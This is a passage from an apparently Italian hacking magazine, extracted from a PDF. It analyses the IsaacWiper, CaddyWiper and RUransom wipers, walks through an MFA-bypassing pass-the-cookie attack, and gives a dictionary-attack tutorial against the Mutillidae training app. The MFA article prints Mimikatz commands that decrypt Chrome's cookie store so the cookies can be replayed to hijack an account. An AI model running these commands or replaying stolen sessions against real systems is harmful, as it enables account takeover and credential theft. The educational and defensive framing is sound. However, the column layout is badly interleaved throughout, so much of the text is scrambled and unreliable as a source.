corromperanno la partizione. posizione fisica sul disco
Se la partizione è NTFS, invece, e i metadati relativi ai file. UN MALWARE DISTRUTTIVO
prima di acquisire il CSP con le A lavoro completato e una IsaacWiper è stato osservato
necessarie API analizza il file più volta riavviato il sistema, nelle directory C:\ProgramData
critico di questo filesystem, l'utente vedrà soltanto una e C:\Windows\System32 sotto
ossia la tabella file master (MFT) schermata vuota con le parole forma di file DLL (cleaner.dll,
che tiene traccia di tutti i file sul “Missing operating system” cl64.dll, cll.dll) o file EXE (clean.
volume, della loro posizione (Sistema operativo mancante). exe, cl.exe) privi di firma

 30

Un esempio dei messaggi di log registrati da IsaacWiper nel file log.txt.
Fonte IBM: https://securityintelligence.com/posts/
new-wiper-malware-used-against-ukranian-organizations
Authenticode. IsaacWiper inizia
il suo processo malevolo
enumerando le unità fisiche (lo
fa chiamando DeviceIoControl()
con il codice di controllo
IOCTL_STORAGE_GET_DEVICE_
NUMBER). Per avviare l’attività
di cancellazione sfrutta
invece CreateFileW()
e DeviceIoControl() con codice
di controllo FSCTL_LOCK_
VOLUME, necessario per
bloccare l’unità [figura #7].
Con l’unità bloccata, il wiper
prende di mira i dischi fisici
collegati al computer
(i PhysicalDrive riconosciuti
da Windows) sovrascrivendo
i primi 0x100000 byte (65.536
KB) di queste unità con dati
creati sfruttando il generatore
di numeri pseudocasuali
(PRNG) Mersenne Twister.
Il malware enumera
poi le unità logiche e cancella
ricorsivamente ogni file
presente in ciascuna di esse
sovrascrivendoli con byte
pseudocasuali generati
anch’essi tramite il PRNG
Mersenne Twister.
Se il wiper non è in grado di
aprire un file, lo rinomina come
WIPER
figura #7 per poi sovrascriverlo con i dati
generati dall’algoritmo
Mersenne Twister.
Se non riesce ad accedere
a un volume, nella sua root crea
una directory nascosta con
all’interno un file temporaneo
(per esempio C:\Tmd1234.tmp\
Tmf5432.tmp) che viene
riempito con dati casuali fino
a quando lo spazio disponibile
non risulta esaurito.
È interessante notare che la
cancellazione ricorsiva dei file
avviene in un singolo thread.
file temporaneo con suffisso Ciò significa che il wiper
“Tmf” seguito da una stringa richiede molto tempo per
casuale di quattro caratteri cancellare dischi di grandi
(per esempio: Tmf3360.tmp), dimensioni.
CO N T R O
UNA PROTEZIONE IP
I MALWARE W ER
Dai rapporti di utilizzo dei malware distruttivi come HermeticWiper
risulta evidente che gli stessi siano stati creati con il preciso scopo di
colpire l’Ucraina. Il rischio che altre organizzazioni, per esempio quelle
italiane, incontrino questa minaccia è al momento ridotto, ma ciò non
significa che si possa abbassare la guardia. Tra le soluzioni di sicurezza
che risultano più efficaci nel proteggere gli endpoint da questa tipologia
di minacce vi è la piattaforma Falcon di CrowdStrike (https://bit.ly/
sitocrowdstrike) che sfrutta il cloud e l’apprendimento automatico
(basato sull’Intelligenza Artificiale e su algoritmi di Machine Learning)
per rilevare tempestivamente eventuali anomalie e impedire che il
malware possa eseguire ulteriori azioni dannose, come il caricamento
di componenti aggiuntivi. Per fare ciò si basa sul comportamento
di precisi indicatori di attacco (IOA), nonché sull’analisi di tecniche
e procedure (TTP) utilizzate da minacce e attori delle minacce.
Un esempio di come l’apprendimento automatico
basato sul cloud della piattaforma CrowdStrike Falcon
riesca a rilevare HermeticWiper.
31 
 SICUREZZA
figura #8

CaddyWiper distrugge soltanto sistemi che non hanno il ruolo di domain controller, così da garantire
agli aggressori l’accesso alla rete bersaglio.
(Fonte ESET: https://twitter.com/ESETresearch/status/1503436433134129158).

CADDYWIPER: IL WIPER CaddyWiper si distribuisce Group Policy Object (GPO),

DELL’ASSEDIO tramite un domain controller come HermeticWiper,
Questo malware (DC), un server Windows indica che gli aggressori
adotta un che nell’ambito di un dominio avevano già il controllo
comportamento gestisce le richieste della rete bersaglio.
ormai di autenticazione per la
“standard” sicurezza e gestisce utenti, AGISCE IN BASE AL RUOLO
per un malware gruppi e risorse di rete. Al momento dell’esecuzione,
wiper (non vi sono novità Poiché tale gestione avviene CaddyWiper esegue infatti
particolarmente eclatanti): tramite Active Directory (AD), la funzione DsRoleGetPrimary
il suo metodo di distruzione emerge che CaddyWiper DomainInformation
consiste infatti nel cancellare è stato progettato per essere per determinare il ruolo
i dati degli utenti utilizzato in situazioni della macchina su cui
e le informazioni in cui l’ambiente AD sia stato è in esecuzione.
delle partizioni dei dischi già compromesso. Se il ruolo di dominio
installati nell’host. Il fatto che sia distribuito tramite risulta essere DsRole_

figura #9

L’attributo SeTakeOwnershipPrivilege usato da CaddyWiper per assumere la proprietà di un file bloccato.

Fonte IBM: https://securityintelligence.com/posts/caddywiper-malware-targeting-ukrainian-organizations/

 32

figura #10
RolePrimaryDomain
Controller, allora CaddyWiper
esce dal processo per non
continuare la sua azione
distruttiva [figura #8].
Se invece il sistema non
è un DC, CaddyWiper inizia
Parte della routine
malevola di CaddyWiper
che provvede alla
cancellazione ricorsiva
dei file. Fonte
ESET: https://twitter.com/
ESETresearch/status/
1503436420886712321/
photo/2
a cancellare in modo ricorsivo
tutti i dati all’interno
di C:\Users, inclusi i file nascosti
e del sistema operativo.
Nel caso in cui un file sia
più grande di 10 MB si limita
a distruggere i primi 40960 byte
WIPER
per velocizzare le operazioni.
Se un file risulta bloccato
da un altro processo,
CaddyWiper tenta prima di
assumerne la proprietà (tramite
SeTakeOwnershipPrivilege)
e poi riprende nella sua
opera di cancellazione
del file [figura #9].
Completata la distruzione
della cartella Users,
il wiper ripete la procedura
su tutte le unità disponibili
e solo al termine cancella
le partizioni di tutti i dischi
fisici (Physicaldrive) rilevati
sovrascrivendo i primi 1920
byte con il valore NULL,
come potete vedere nel codice
della [figura#10].

SOM, IL CONTRATTACCO DELL’UCRAINA?

RURAN
Non è soltanto l'Ucraina a essere bersagliata dai malware
wiper. Il primo marzo 2022 il Malware Hunter Team ha
segnalato su Twitter (https://bit.ly/ruransomsample)
l’apparizione di un nuovo malware wiper
(soprannominato RUransom dal suo sviluppatore)
che, questa volta, ha come obiettivo la Russia.
Secondo il rapporto di TrendMicro, diverse versioni di
questo malware sarebbero state rilevate tra il 26 febbraio
e il 2 marzo 2022. RUransom (scritto in .NET) agisce
come un ransomware, ma è di fatto un wiper anti-Russia
poiché espressamente progettato per crittografare i file
dei sistemi russi e causarne la distruzione irreversibile
(agisce su tutti i file a eccezione dei file .bak che vengono
invece cancellati direttamente). La nota di riscatto,
contenuta nel file Полномасштабное_
кибервторжение.txt (Invasione informatica su vasta
scala.txt) manifesta tutta l’ostilità del suo sviluppatore:
“Il 24 febbraio, il presidente Vladimir Putin ha dichiarato
guerra all’Ucraina. Per contrastare questo, io, il creatore
di RUransom, ho creato questo malware per danneggiare
la Russia […]. Non c’è modo di decifrare i suoi file. Nessun
pagamento, solo danni”. RUransom si diffonde come un
worm copiando l’eseguibile Россия-Украина_Война-
Обновление.doc.exe (Russia-Ucraina aggiornamento
sulla guerra.doc.exe) su tutti i dischi rimovibili e le unità
di rete mappate. Il workflow della crittografia usa
l’algoritmo AES-CBC per generare chiavi casuali
e univoche per ciascun file crittografato. Inoltre, poiché
le chiavi non vengono memorizzate da nessuna parte,
tale processo risulta di fatto irreversibile.

Frammento di codice
in cui il malware verifica se
viene eseguito dalla Russia,
in caso contrario evita
di attaccare il sistema.

33 
 SICUREZZA
autenticazione
La doppia
E BACATA
Molti YouTub er st an n o su b en d o u n attacco simile,
perché anche la 2FA n
N o n cl ic ca re su l li n k
L’unico rimedio?
L’
autenticazione
a più fattori (MFA)
è un ottimo modo
per aumentare
la sicurezza di applicazioni Web,
sessioni desktop remote, VPN
e di qualunque altra risorsa a cui
un utente possa accedere online.
Introducendo uno o più fattori
aggiuntivi nel processo di
autenticazione è possibile
dimostrare che qualcuno
è effettivamente chi dice di essere
e prevenire una quantità
significativa di furti d’identità
e attacchi basati sulle credenziali.
 34
on è sicura.
sbagliato!
NON È INVIOLABILE
Tuttavia, quando si adotta e si
implementa la tecnologia MFA
è importante capire esattamente
cosa può fare e cosa no,
e quali lacune di sicurezza
non vengono colmate.
Sebbene l’MFA sia eccezionale,
non è una panacea per la sicurezza
e dovrebbe essere considerata
come una parte di una strategia
di sicurezza totale.
Una tecnica interessante è l’utilizzo
dei cookie del browser per aggirare
l’MFA con un attacco pass-the-
cookie. In questo articolo
si esplorerà questo attacco,
come funziona e quali metodi
di protezione esistono.
COOKIE DEL BROWSER
Ai fini di questa ricerca, la cosa
importante da sapere è che
i cookie del browser sono uno
dei modi in cui le applicazioni Web
memorizzano le informazioni
di autenticazione dell’utente.
Così facendo un sito Web può
mantenervi connessi e non
richiedervi costantemente nome
utente e password ogni volta che
fate click su una nuova pagina.

Ora, cosa succede se quei cookie
di autenticazione cadono
nelle mani sbagliate?
PASS-THE-COOKIE
Fondamentalmente, se si utilizza
la MFA nelle applicazioni Web,
all’utente che effettua il login
verrà richiesto di fornire ulteriori
garanzie di accesso, come
accettare una notifica push
sul proprio dispositivo mobile.
Dopo aver superato tutti questi
test, l’utente può accedere all’app.
A quel punto, viene creato
e memorizzato un cookie del
browser per la sessione.
Se un malintenzionato fosse
in grado di estrarre questi cookie,
potrebbe replicare la sessione
dell’utente attaccato,
autenticazione compresa,
in una sessione del browser
completamente separata
su un altro sistema, bypassando
tutti i checkpoint MFA
lungo il percorso.
Questo attacco, che di fondo usa
il phishing per ingannare gli utenti,
è un esempio di quanto si siano
evoluti i cybercriminali nel tempo
ESTRARRE I COOKIE
Il test è basato sul browser
Google Chrome che memorizza
i suoi cookie nella seguente
posizione in un database SQLite:
%localappdata%GoogleChromeUser
DataDefaultCookies
La parte difficile è che quei cookie
vengono crittografati utilizzando
chiavi legate all’utente a cui
appartengono. Quindi avete
bisogno di un modo per ottenere
l’accesso al database dei cookie
e per decrittografare queste
informazioni in testo normale.
Utilizzando Mimikatz (https://
github.com/ParrotSec/mimikatz)
siete in grado di estrarre i cookie
di un utente, anche se sono
crittografati, con questo comando:
dpapi::chrome /
in:“%localappdata%Google
ChromeUser DataDefaultCookies”
/unprotect
2FA
All’URL https://link.springer.com/
article/10.1007/s10207-021-
00548-5 potete leggere un paper
in inglese, ma scritto da tre italiani,
che spiega l’attacco alla 2FA.
che va impartito da riga di
comando in questo modo:
mimikatz.exe privilege::debug
log “dpapi::chrome
/in:%localappdata%google
chromeUSERDA~1defaultcookies
/unprotect” exit
Ora che avete i cookie, dovete
solo trasferirli in un’altra sessione
per prendere il controllo
dell’account dell’utente aprendo
un’applicazione Chrome su un
server Kali Linux e utilizzando
l’opzione Ispeziona del browser
per aggiungere nuovi cookie.
Andando su Applicazione >
Cookie si potranno vedere
i cookie correnti che non
includono ESTSAUTH
o ESTSAUTHPERSISTENT,
il che preclude la richiesta
dell’autenticazione a due fattori
sul sito/app target.
Il gioco quindi è fatto.
COME DIFENDERSI
Per prevenire questo tipo
di attacchi possono essere messe
in atto politiche più rigorose sulla
cancellazione dei cookie, evitando
però di far impazzire le persone
con la riautenticazione costante
ogni volta che navigano su un sito.
Le indicazioni di massima, anche
se frustrante per alcuni applicativi,
è non sincronizzare gli account
dei browser, non memorizzare
le password e non cliccare
mai su collegamenti inviati
via email/social se non si ha
la certezza di chi li ha inviati.
35 
 SICUREZZA

SESTA PARTE

Attacco
a d i z i o n a r i o !
izzare un dictionary
Come progettare e real
GLOSSARIO ra to su un a Web ap plication reale!
DI BASE attack calib

L
LOG POISONING a nostra “palesta per ci hanno permesso di ottenere una
Sotto questo nome ricade pentester”, l’ambiente shell (per giunta persistente)
quella classe di attacchi virtuale (vedi il link https:// sul server Web della rete. Più
basati sull’iniezione di codice bit.ly/palestra_hj) che precisamente, per accedere al server
malevolo all’interno dei file utilizziamo per le esercitazioni, ci ha abbiamo dovuto fare leva su due
di log prodotti da un sistema
consentito sin qui di confrontarci distinte vulnerabilità (LFI, Local File
nel corso del suo
funzionamento ordinario. con una vasta gamma di attacchi Inclusion, e RCE, Remote Command
e di tecniche offensive. Nelle puntate Execution) che affliggono Mutillidae
LOCAL FILE INCLUSION più recenti ci siamo soffermati (la Web application, descritta nel box
È il nome di un attacco sul log poisoning, ideando omonimo, oggetto in questa fase
teso a esfiltrare i file e implementando tecniche che delle nostre attenzioni):
contenuti nel filesystem
locale di un server Web
(che, è bene sottolineare,
in condizioni normali non
figura #1
dovrebbero essere accessibili
all’utente Web) sfruttando
un’apposita vulnerabilità
della Web application,
generalmente legata
a un insufficiente controllo
di un input utente.

REMOTE COMMAND
EXECUTION
Gli attacchi di tipo RCE
consentono a un attore
malevolo di forzare
l’esecuzione di comandi
arbitrari su un server remoto. La schermata di login di Mutillidae,
oggetto del nostro attacco.
 36
 PENETRATION TEST
Ecco come accedere alla
pagina che riporta tutti figura #2
gli utenti locali della
Web app.
la combinazione di tali
vulnerabilità, unitamente a un
accorto “avvelenamento” del log
auth.log attraverso una
connessione SSH malevola (e alla
contestuale installazione sul server
di una Webshell), ci ha consentito
di raggiungere il nostro obiettivo,
“mettendo un piede” all’interno
della rete target. testare) ci “obbligano” a individuare vettori d’attacco (in modo da
soluzioni complesse, che individuare il numero maggiore
LOW-HANGING FRUIT richiedono competenza, possibile di falle, permettendo
Da questa breve introduzione pianificazione e un certo grado di al cliente di applicare adeguate
appare chiaro come le attività esperienza. Non sempre, tuttavia, contromisure), è altrettanto vero
poste in essere, sebbene le cose stanno così: in determinati che sfruttare per prime le più
tecnicamente piuttosto “sfidanti”, contesti possono essere disponibili semplici (ovvero cogliere quelli
non siano state semplici e lineari. anche vie d’accesso più elementari, che in gergo sono denominati
Spesso durante una verifica di sebbene altrettanto efficaci per low-hanging fruit) può
sicurezza le condizioni a contorno i nostri scopi. Se è vero che nel avvantaggiare non poco il nostro
(in primis la complessità e il grado corso di un penetration test è lavoro, mettendoci a disposizione
di protezione dell’infrastruttura da opportuno testare tutti i possibili informazioni e/o canali d’accesso

d i t e s t c o m p l e t o
Un ambiente Rete
Internet 211.100.1.2 Target

Backbone
211.100.1.1 Server
212.100.1.3 FTP
Router
212.100.1.1

210.100.1.2
212.100.1.2
Pentester Server
210.100.1.1 Web

All’URL https://bit.ly/palestra_hj
trovate le istruzioni per creare
la palestra virtuale. 37 
 SICUREZZA
figura #3 Se doveste imbattervi
in questo errore,
niente paura!

La pagina che riporta

tutti gli utenti locali
della Web app.
in grado di semplificare
l’esecuzione delle attività a più alto
tasso tecnico.
figura #4
DICTIONARY ATTACK
In quest’ottica, non dobbiamo
disdegnare attacchi più elementari
come brute force o dictionary
attack, in grado di fornire un
accesso (persino privilegiato,
a seconda dell’account attaccato!)
senza troppi fronzoli. Attenzione:
per “attacchi più elementari” non
intendiamo operazioni eseguibili
“a occhi chiusi” o lanciando in
maniera non curante un qualche di fare il lavoro per conto nostro. le autenticazioni dei servizi FTP e
script in grado (magicamente!?) Piuttosto, stiamo parlando SSH in esecuzione sul server Web:
di attacchi che, pur richiedendo l’unica differenza con il nostro caso
comunque una doverosa è nel tipo di protocollo da utilizzare

Mutillidae preparazione (al pari di qualsiasi

altra attività che un vero pentester
(HTTP) e nel tool impiegato.

Mutillidae è una Web
application didattica,
Open Source e liberamente
installabile da chiunque
intenda migliorare le proprie
capacità di pentester. Rispetto
ad altre Web app simili (come
“Damn Vulnerable Web
Application”, che abbiamo visto
nelle puntate precedenti)
si contraddistingue per il suo
approccio basato sulle
vulnerabilità appartenenti alla
lista denominata “OSWAP Top
10”, che racchiude le 10 falle
più diffuse in ambito Web.
Sotto questo profilo Mutillidae
ci offre un ambiente
addestrativo privilegiato,
consentendo di confrontarci
con le diverse incarnazioni
di ciascuna delle vulnerabilità
incluse nella “OSWAP Top 10”.
esegua sui sistemi target dei propri
clienti), risultano tecnicamente più
semplici o – quanto meno – più
facilmente ripetibili. In altri termini,
una volta eseguito un dictionary
attack, tutti gli altri saranno
concettualmente simili,
susseguendosi attraverso
le medesime fasi: dovremo
individuare uno o più username da
attaccare, una wordlist da utilizzare
nella speranza di scoprire le
password degli utenti, scegliere
un tool in grado di effettuare per
conto nostro il login automatizzato
al servizio target, configurarlo
adeguatamente e infine avviare
l’attacco. Nei numeri precedenti,
per esempio, abbiamo spesso
fatto ricorso a Hydra per attaccare
ZED ATTACK PROXY
Sebbene Hydra possa essere
considerato uno specialista per
questo tipo di attacchi, per
l’occasione preferiamo far
nuovamente ricorso a Zed Attack
Proxy (ZAP), il tool Open Source
distribuito da OWASP per l’analisi
delle vulnerabilità dei siti Web.
Useremo nuovamente la
funzionalità di fuzzing già vista
all’opera nei numeri precedenti,
adattandola stavolta a un
dictionary attack rivolto contro la
schermata di login all’area privata
di Mutillidae, che possiamo
visualizzare al link [figura #1]
http://www.labpentest.hj/
mutillidae/index.php?page=login.
php.

 38

ESTRARRE GLI UTENTI
Prima dell’attacco è necessario
individuare lo username degli
utenti da “craccare”. Si tratta di una
fase preliminare tanto laboriosa
quanto fondamentale per la buona
riuscita del compito: in linea di
massima, a parità di wordlist
utilizzata, a un numero maggiore
di utenti corrisponde un numero
maggiore di successi, ovvero
di password individuate.
Generalmente l’estrazione degli
utenti richiede un certo grado di
interazione con l’applicazione Web:
è necessario navigare le sue pagine
alla ricerca delle “tracce” che
ciascun utente dissemina quando
è impegnato in attività come l’invio
di messaggi pubblici, la
realizzazione di post, l’acquisto di
beni o la pubblicazione di
recensioni. La maggior parte delle
Web app mostra pubblicamente le
informazioni correlate a questo
tipo di attività, che in qualche caso
sono associate al nome utente
(piuttosto che al nome di
battesimo) di chi le ha eseguite.
UTENTI DI MUTILLIDAE
In questo, Mutillidae non fa
eccezione: la Web app offre un
rudimentale blog, a cui possono
L’elenco degli utenti locali della Web app.
PENETRATION TEST
accedere sia gli utenti anonimi
sia, soprattutto, quelli registrati.
Particolare ancora più interessante
agli occhi di un pentester,
Mutillidae mette a disposizione
una comodissima interfaccia
per selezionare i post di un singolo
utente, che può essere scelto
attraverso una pratica lista
comprendente tutti gli utenti locali
della Web application. Possiamo
accedervi cliccando sull’apposito
link presente nel menu laterale,
selezionando le voci Others |
JavaScript “Security” | Add to
your blog [figura #2]. Qualora
la Web app dovesse restituirvi una
pagina d’errore [figura #3], non
occorre disperarsi: si tratta di un
problema nel link, al quale si può
porre rimedio sostituendo
l’indirizzo del server Web
(www.labpentest.hj) al termine
“localhost”, in modo da ottenere
l’URL [figura #4] http://www.
labpentest.hj/mutillidae/index.
php?page=view-someones-blog.
php.
LISTA DEGLI UTENTI
Se clicchiamo sulla lista di selezione
con etichetta Please Choose
Author possiamo
figura #5
I post pubblicati nella Web app.
vedere l’elenco degli utenti della
Web app [figura #5], compreso
(per ultimo) l’utente hj che
abbiamo creato nelle puntate
precedenti. A questo punto,
selezionando il nome di uno degli
utenti e premendo il pulsante View
Blog entries, possiamo
visualizzare i post di un utente
specifico; viceversa, se
selezioniamo l’opzione Show all,
abbiamo l’occasione di esaminare
i post di tutti gli utenti [figura #6].
In questa sede, tuttavia, non siamo
interessati ai post quanto piuttosto
agli utenti stessi che li hanno
prodotti: uno dei dati da dare
in pasto a ZAP per avviare il
dictionary attack contro il form
di autenticazione a Mutillidae è
costituito proprio dall’elenco degli
username di tali utenti. Il modo più
rapido per accedere a questo
elenco è estrarlo dal codice HTML
della pagina: dal browser,
selezioniamo View HTML, quindi
individuiamo il codice [figura #7]
relativo alla select list che ci
consente di impostare il filtro per
autore nella visualizzazione dei
post (l’operazione è più rapida e
semplice se si cerca, all’interno del
figura #6
39 
 SICUREZZA
Il codice HTML relativo alla
codice, il tag </option>). Copiamo
quindi la porzione di codice HTML
all’interno di un file che
denomineremo utenti-grezzi.txt:
al suo interno troveremo la lista
degli username da sottoporre
all’attacco, ma prima che questa
possa essere concretamente
utilizzata c’è bisogno ancora
di un po’ di lavoro.
FORMATTARE LA LISTA
In linea di massima, infatti, i tool
per l’esecuzione di brute force
o di dictionary attack accettano
e gestiscono in input due liste
separate (una per gli username,
una per le password da utilizzare)
a patto che queste siano
formattate in modo che ciascuna
riga contenga una singola voce.
 40
figura #7
select list per la scelta
dell’utente locale di cui
visualizzare i post.
figura #8
La schermata
di ZAP che
consente
l’inserimento dei
nomi utenti da
attaccare sotto
forma di lista
in cui ogni riga
corrisponde a un
nome utente.
Lo abbiamo visto qualche numero
fa con Hydra, ma l’interfaccia
di fuzzing di ZAP si comporta nel
medesimo modo, consentendoci
di inserire username e password
sotto forma di un elenco di
stringhe suddivise in righe
[figura #8] oppure estraendo tale
elenco direttamente da un file
di testo formattato nel medesimo
modo [figura #9].
CREIAMO LO SCRIPT
Per trasformare la nostra lista
di utenti nel medesimo formato
abbiamo due strade: o ce ne
occupiamo manualmente, oppure
realizziamo un piccolo script
che lo faccia per conto nostro.
Considerata la nostra pigrizia
atavica (ma anche che le
dimensioni coinvolte in uno
scenario reale potrebbero essere
eccessive per un lavoro
esclusivamente di tipo manuale),
cogliamo al balzo l’idea di realizzare
un piccolo script Python, in modo
da allenare anche quelle skill
da sviluppatori che tornano
sicuramente utili a qualsiasi
aspirante penetration tester.
Concettualmente, il lavoro dello
script non è complesso: all’interno
del codice HTML estratto dalla
pagina, infatti, i nomi degli utenti
sono compresi tra il tag <option>
e il tag </option>. Per esempio,
per il primo utente (admin),
abbiamo [figura #7]:
<option value=“admin”>admin</
option>
Per il secondo
<option
value=“adrian”>adrian</option>
e così via. Recupereremo il file che
avevamo chiamato utenti-grezzi.txt
e lo daremo in pasto allo script
Python così che possa effettuarne
il parsing alla ricerca dei nomi
utente.
IL CODICE
Per semplificare
l’implementazione, possiamo
affinare ulteriormente la nostra
strategia, individuando (e
stampando in output) le stringhe
comprese tra il tag </option>
e il carattere ‘>’ immediatamente
precedente. Il codice risultante,
riportato in [figura #10], può
essere suddiviso concettualmente
in tre parti.
1 l’apertura del file in
lettura, con relativo

controllo degli eventuali
errori d’accesso:
nomefile=“utenti-grezzi.txt”
try:
file=open(nomefile,“r”);
except:
print(“Non riesco ad
aprire il file ” + nomefile);
exit();
2 il ciclo di lettura, che:
• estrae per ciascuna riga del file
i nomi utente ivi presenti, ottenuti
mediante stampa a video della
stringa compresa tra il tag
</option> (a cui punta la variabile
fine) e il carattere ‘>’
immediatamente precedente
(a cui punta la variabile inizio),
estremi esclusi;
• si interrompe (il cliclo while(1)
è virtualmente senza fine) solo
una volta terminata la lettura del
file: al verificarsi di tale evento,
viene sollevata un’eccezione
prontamente catturata dalla
clausola except, con conseguente
esecuzione dell’istruzione
break che determina l’effettiva
uscita dal ciclo;
for line in file:
PENETRATION TEST
L’ESECUZIONE
figura #9 A questo punto non ci resta
che salvare il codice con il nome
La schermata di ZAP pulisciUtente.py e mandarlo
che consente in esecuzione, con il comando
l’inserimento delle
# python pulisciUtente.py
password da utilizzare
per l’attacco, stavolta
per ottenere la tanto agognata lista
prelevate da un file di
degli utenti di Mutillidae contro
testo opportunamente
i quali scatenare il nostro attacco
formattato.
[figura #11]. Come possiamo
notare, nell’elenco figura anche
l’utente hj, da noi creato nelle
fine=-1; precedenti puntate per agevolare
while (1): la verifica di sicurezza: è bene
inizio=fine+1; ricordarci di escluderlo dall’attacco,
try: in quanto cercare di forzarne la
password (da noi stessi impostata!)
costituisce solo un’inutile perdita
fine=line. di tempo e di risorse.
index(“</option>”,inizio);
inizio=line. E LA WORDLIST?
rindex(“>”,inizio,fine)+1; Prima di sferrare l’attacco ci rimane
un’ultima attività: scegliere
print(line[inizio:fine]); il dizionario da utilizzare. A tal
except: riguardo dobbiamo sfuggire dalla
break; tentazione di optare per la wordlist
più corposa a nostra disposizione,
3 a chiusura del file in quanto non sempre “grande
è meglio”. Una wordlist di 1.000
file.close(); potenziali password, anche se
figura #10
Il codice del
nostro script
Python per
l’estrazione
dell’elenco
di utenti da
attaccare.
41 
 SICUREZZA
figura #11
Il risultato
dell’esecuzione
dello script.
impiegata per l’attacco di soli 17
utenti (avendo già escluso l’utente
hj) comporta l’esecuzione di ben
17.000 tentativi di login, da
sommare a quelli degli utenti
ordinari (tutt’altro che trascurabili,
se stiamo effettuando una verifica
di sicurezza su un sistema di
produzione!). Si tratta di un carico
aggiuntivo che, se nel nostro caso
specifico non comporta particolari
problematiche (a eccezione del
tempo d’attesa necessario
all’esecuzione dei tentativi di login),
deve essere opportunamente
vagliato insieme al titolare
dell’infrastruttura testata, al fine
di scongiurare ogni pericolo di
intaccare la disponibilità dei servizi
oggetto di verifica. Come se non
bastasse, poi, in determinate
tipologie di verifica (per esempio
quelle di tipo double-blind, pensate
anche per “testare” non solo
l’infrastruttura target, ma anche
il grado di reattività, le conoscenze
e le capacità di gestione di un
incidente di sicurezza del personale
deputato alla gestione dei servizi),
il comparto IT del cliente non è
assolutamente a conoscenza delle
attività dei pentester: di
conseguenza, un’attività
“rumorosa” come un tool che
esegua migliaia di tentativi di login
 42
figura #12
La directory da cui scegliamo le wordlist
da utilizzare per i dictionary attack.
ne comporterebbe inevitabilmente sufficiente varietà di password
la scoperta o, peggio, sarebbe da provare per ciascun account
trattato al pari di un attacco presente nella lista. Nulla ci vieta,
informatico vero e proprio. poi, di effettuare un dictionary
attack “su più ondate”, andando
L’ATTACCO ad affinare (e ampliare) il dizionario
Per fortuna la directory /usr/ utilizzato di pari passo con il
share/wordlists della distro Kali progredire dell’attacco: in questo
installata sulla VM Pentester modo la wordlist http_default_
è ricca di dizionari di ogni tipo e password.txt sarà utilizzata per
dimensione: noi ci soffermeremo provare a “rompere” la password
su quelli contenuti nella di tutti gli utenti, ma solo quelli più
sottodirectory metasploit [figura “resistenti” (che, auspicabilmente,
#12], impiegati dall’omonimo tool saranno in numero minore)
ma disponibili anche al di fuori del si vedranno scatenare contro le
software prodotto da Rapid7. Più wordlist più evolute e/o corpose.
precisamente, inizieremo con la Ma questa è un’altra storia, che
wordlist http_default_password. vedremo nel prossimo numero...
txt, che conta appena 19
potenziali password [figura
#13]: in questo modo, se
da un lato i tempi d’attesa
saranno mantenuti bassi
(ma comunque nell’ordine
di una decina di secondi,
dovendo effettuare oltre
300 tentativi di login alla
medesima Web
application), dall’altro
disporremo di una
La wordlist che
utilizzeremo per
l’attacco.
HOW TO
Pixelling Testi pixellati, ora craccati!
Proteggere i propri segreti pixellando le immagini non è più un metodo sicuro.............................. 44

scocciatori Come rendere visibile un numero privato

C’è un modo gratuito per “smascherare” chi effettua telefonate usando il prefisso #31#...............48

filesystem Alla scoperta di NTFS, terza parte

Vediamo come il filesystem NTFS, tipico dei sistemi Windows, conserva i file................................... 52
 HOW TO

TESTI PIXELLATI, ORA

CRACCATI! Pixellatura, sfocatura, spirale?
Se usate ancora questi filtri per
nascondere i vostri segreti più
intimi, allora sappiate che…

I
IN BREVE  l pixeling (o mosaicing) è una
particolare tecnica di offuscamento
Ecco come funziona
che tramite algoritmi di sfocatura
il tool che permette
di riconoscere gli (blurring) diffonde i pixel cercando
elementi pixellati di imitare i problemi di messa a fuoco
nelle foto o all’interno delle fotocamere, riducendo così la
dei testi. risoluzione e la qualità delle immagini.
DIFFICOLTÀ Gli algoritmi di pixellatura più usati (in
software come GIMP, Photoshop, ecc.),
detti “filtri a scatola lineare” (di tipo
deterministico), dividono l’immagine
in una griglia di blocchi di pixel e per
L’algoritmo di pixellatura
ciascun blocco viene calcolato il valore
“a scatola lineare” divide
l’immagine in una griglia medio dei pixel presenti. Infine, si
e sostituisce il colore di sovrascrivono tutti i pixel del blocco
ciascun blocco con quello con il loro valore medio calcolato.
derivante dalla media Si ottiene così un’immagine finale
dei blocchi presenti
incomprensibile a chi la osserva.
nell’immagine originale
in quella stessa area. Sebbene alcune informazioni vengano
perse durante l’elaborazione del
processo, non si tratta di una
procedura totalmente distruttiva
dei pixel, quindi molte di queste
informazioni rimangono. E sono
proprio queste che, sapendo come
agiscono tali filtri, si possono usare per
ricostruire l’informazione originale.
L’ALLERTA DEI RICERCATORI
Negli anni, diversi ricercatori hanno
cercato di dimostrare l’inefficacia di
questa tecnica in termini di sicurezza,
proponendo soluzioni concettualmente
analoghe tra loro: quando non sono
disponibili informazioni sufficienti a
ricostruire l’immagine, si può procede
a pixellare dati simili per verificare se
corrispondono al campione pixellato.

figura #1
Tale approccio logico si ritrova anche
nell’algoritmo di Depix, un tool di
recupero delle password pixellate
negli screenshot, scritto in Python
e rilasciato a dicembre 2020 da Sipke

figura #2 Mellema (https://bit.ly/depix).

Nonostante le sue limitazioni, di cui
si parlerà, Depix ha avuto il grande
merito di riaccendere la discussione sul

Ai fini di un corretto riconoscimento

del testo pixellato, Depix necessita
che lo stesso abbia determinate
caratteristiche: colore dello sfondo, font
del testo, spaziatura dei caratteri ecc.
In caso contrario, il risultato potrebbe
risultare scadente o del tutto assente.

 44

tema, sensibilizzando gli utenti
a non adottare più tali tecniche
(pixeling, blur, swirl, fuzzy, ecc.)
per celare dati sensibili. Uno degli
studi più significativi in questo
settore è stato pubblicato nel
2016 (https://bit.ly/depixpdf);
il paper mostra come l’utilizzo
di una particolare classe di modelli
statistici, cosiddetti “modelli
nascosti di Markov”, HMM (https://
it.wikipedia.org/wiki/Modello_di_
Markov_nascosto), consentano
di recuperare dalle immagini
stringhe di testo offuscato in
diversi contesti: vari tipi di font,
dimensioni dei caratteri,
dimensioni della griglia, offset dei
pixel e livello di rumore. Questo
approccio si basa sul successo
ottenuto dall’impiego degli HMM
nelle tecniche di Machine Learning
e in particolare nel riconoscimento
vocale automatico usato per
recuperare sequenze di fonemi
da espressioni vocali. Ebbene,
traendo spunto da questa ricerca
e basandosi sulle librerie di Depix,
a settembre 2021 lo sviluppatore
Jonas Schatz ha rilasciato il tool
DepixHMM (https://bit.ly/
